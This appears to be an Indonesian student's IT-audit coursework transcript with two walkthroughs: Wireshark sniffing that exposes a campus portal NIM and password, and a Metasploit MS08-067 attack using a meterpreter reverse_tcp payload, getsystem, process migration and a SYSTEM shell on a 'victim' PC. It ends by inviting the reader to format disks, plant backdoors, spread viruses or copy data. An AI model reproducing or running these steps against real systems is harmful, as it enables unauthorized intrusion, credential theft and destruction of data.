It audit tools

11
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG 1

Transcript of It audit tools

Page 1: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

1

Page 2: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

2

WIRESHARK

1. Melacak password pada jaringan menggunakan Wireshark Sebelum kita menggunakan tools tesebut ada baiknya kita terlebih dahulu mengetahui kegunaan dari tools yang akan kita gunakan. Wireshark itu apa ya??? Newbe ckckckkck Wireshark merupakan salah satu dari sekian banyak tool Network Analyzer yang banyak digunakan oleh Network administrator untuk menganalisa kinerja jaringannya terrmasuk protokol didalamnya. Wireshark banyak disukai karena interfacenya yang menggunakan Graphical User Interface (GUI) atau tampilan grafis. Wireshark mampu menangkap paket-paket data atau informasi yang berterbangan dalam jaringan. Semua jenis paket informasi dalam berbagai format protokol pun akan dengan mudah ditangkap dan dianalisa. Karenanya tak jarang tool ini juga dapat dipakai untuk Sniffing (memperoleh informasi penting seperti password email atau account lain) dengan menangkap paket-paket yang berterbangan di dalam jaringan dan menganalisanya. Setelah kita mengetahui fungsi dari software yang akan kita gunakan, kali ini kita akan mencoba salah satu dari fungsi Wireshark yaitu Sniffing. Bagaimana caranya.....???? yuk ikuti langkah berikut ini.. a. Pertama-tama kita harus menginstal terlebih dahulu program Wireshark pada

computer/Laptop yang akan kita gunakan, untuk Software Wireshark –nya dapat di download di sini http://www.wireshark.org/

b. Setelah di download, langsung saja instal program Wireshark-nya. Gak susah kok nginstallnya tinggal next-next aja.....

c. Jika proses penginstalan berhasil dengan mulus kurang lebih tampilan programnya seperti

Gambar 1 : Loading configuration files wireshark

Page 3: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

3

Gambar 2 : Tampilan awal Wireshark

d. Selanjutnya, seperti rencana awal kita tadi, kita akan melakukan Sniffing pada

suatu jaringan wireless, so ikuti langkah selanjunya. e. Pilih Interface List seerti gambar dibawah ini

Gambar 3 : Interface List

Page 4: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

4

f. Setelah kita memilih Interface List, maka akan tampil seperti gambar berikut :

Gambar 4 : Wireshark Capture interface

pada gambar diatas merupakan pilihan koneksi jaringan yang akan kita gunakan, pada tutorial ini saya memilih jaringan Wireless seperti gambar diatas,

g. Setelah kita jalankan maka secara otomatis Wireshark akan mendeteksi paket-paket data dan seluruh aktivitas yang berlangsung pada koneksi wireless yang telah kita

pilih seperti gambar berikut :

Gambar 5 : Capturing from Wireshark Network Connection

Ketikkan “http” seperti gambar diatas tanpa tanda petik, lalu tekan tobol enter. Tunggu beberapa saat, sampai proses scan wireshark hanya menampilakan akses HTTP yang sedang berlangsung. Bingung???? Hahhahah biar sama-sama ngerti mari kita langsung jalankan skenarionya...! Begini, pertama-tama saya akan membuka dan login pada halaman berikut ini : http://mahasiswa.atmaluhur.ac.id/index.php

Page 5: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

5

Gambar 6 : Halaman Login Mahasiswa STMIK Atmaluhur

Secara otomatis halaman yang saya buka pasti akan tercantum pada list histori akses seperti yang tertunjuk pada tanda panah merah dibawah ini :

Gambar 7 : Capturing from Wireshark Network Connection

Artinya, ketika kita membuka alamat http://mahasiswa.atmaluhur.ac.id/index.php maka alamat tersebut, akan terekam sebagai log aktivitas yang berlangsung pada jaringan tersebut,

Page 6: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

6

h. Selanjutnya klik kanan pada pilihan yang tertunujuk pada panah merah seperti gambar diatas, kemudian pilih Follow TCP Stream. Maka akan tampil seperti gambar berikut :

Gambar 8 : Follow TCP Stream

i. Perhatikan kotak hijau yang terdapat pada gambar diatas merupakan NIM serta PASSWORD login saya pada halaman website mahasiswa.atmaluhur.ac.id

Page 7: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

7

Metasploit

2. Exploit Windows With Metasploit – Backtrack Setelah kita menggunakan Wireshark, kali ini kita akan mencoba tools selanjutnya yaitu

Metasploit.

Apa itu Metasploit??? Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk melakukan penestrasi kedalam sebuah system. metasploit framework bisa juga di katakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit. Metasploit framework sering dibuat dengan menggunakan bahasa pemrograman Ruby. Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada padajarakjangkauan yang jauh tetapi dapat mengendalikan komputer korban.

Oke langsung saja ke sekenario yang akan kita laksanakan adalah kita akan mencoba untuk penetrasi ke dalam computer target yang telah kita tentukan dengan menggunakan Metasploit. Langsung saja ikuti langkah berikut ini :

a. Saya asumsikan bahwa dikomputer atau laptop yang anda gunakan saat ini telah terinstal software Backtrack, selanjutnya lakukan scan IP dan Port yang terbuka pada jaringan menggunakan nmap yang telah tersedia di backtrack. buka terminal ketik perintah nmap -sn 192.168.0.1-255 -sn adalah perintah nmap untuk melakukan scanning IP yang aktif / tidak.. -192.168.0.1-255 adalah IP yang akan kita scan, dari 192.168.0.1 sampai 192.168.0.255

Note : Untuk IP nya dapat disesuaikan dengan IP yang anda gunakan

b. Lalu jika sudah menemukan IP yang aktif kita scan Port yang terbuka pada target..contoh saya mendapakan IP 192.168.0.4 lakukan perintah nmap -f 192.168.0.4

Note : -f adalah fast scanning sehingga nmap akan melakukan scanning secepat mungkin… lihat hasilnya

Page 8: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

8

Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework versi console..

c. ketik perintah msfconsole pada terminal/console. tunggu biasanya agak lama. setelah terbuka ketik search netapi dan setelah itu kita gunakan yang exploit/windows/smb/ms08_067_netapi ketik perintah use exploit/windows/smb/ms08_067_netapi ketik show options untuk melihat opsi apa yang harus kita isi.

d. Langkah selanjutnya kita harus mensetting RHOST terlebih dahulu dengan cara

ketik RHOST dengan ip target lakukan perintah set RHOST 192.168.0.4 Note : IP address menyesuaikan dengan IP Target kita

Page 9: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

9

set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya ) set LPORT 4444 ( port pada Backtrack ) set PAYLOAD windows/meterpreter/reverse_tcp jalankan exploit dengan perintah exploit tampak hasilnya seperti berikut ini :

Sejauh ini kita sudah bias masuk di bagian Meterpreter. Yeee Horeeee Sekarang kita akan mengendalikan Command Prompt ( CMD ) korban , tapi sebelumnya kita lihat dulu posisi kita...

e. pertama kita lihat siapa kita, dengan perintah getuid, dan outputnya NT AUTHORITY\SYSTEM , tapi bagaimana jika bukan NT AUTHORITY\SYSTEM alias si korban tidak menjalankan sebagai administrator pada komputernya? kita lakukan ketik perintah getsystem , lalu cek lagi dengan perintah getuid jika sudah NT AUTHORITY\SYSTEM lanjutkan... kita ketik perintah pwd untuk cek keberadaan kita dan pada output saya adalah C:\WINDOWS\system32 langsung ketik perintah shell untuk eksekusi CMD..dan hasilnya tampak seperti gambar berikut :

Page 10: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

10

tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat memasukan perintah shell tidak ke C:\Windows\system32 ??? mungkin procces dirrectory nya tidak tepat... jika masalah seperti itu lakukan perintah migrate...kita akan berpindah.. ketik perintah ps pada meterpreter untuk melihat process ID yang ada... setelah keluar kita cari PID svchost.exe, jika sudah ketemu pindahlah dengan perintah migrate contoh : migrate 1328 jika sukses, cek dengan perintah pwd , lalu jalankan perintah shell.. Seperti gambar berikut :

Page 11: It audit tools

Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG

11

jika sudah berada di C:\Windows\system32> berarti kita sudah sukses menyusup ke computer Target yang kita tentukan tinggal selanjutnya bagaimana yang ingin kita lakukan terhadap computer korban, mau Format Harddisk korban,shutdown,pasang backdoor,sebarin virus,copy data apalah terserah mau Remmote Desktop. Yah kita yang kendalikan. Tergantung Hati Nurani masing-masing. Hehheheh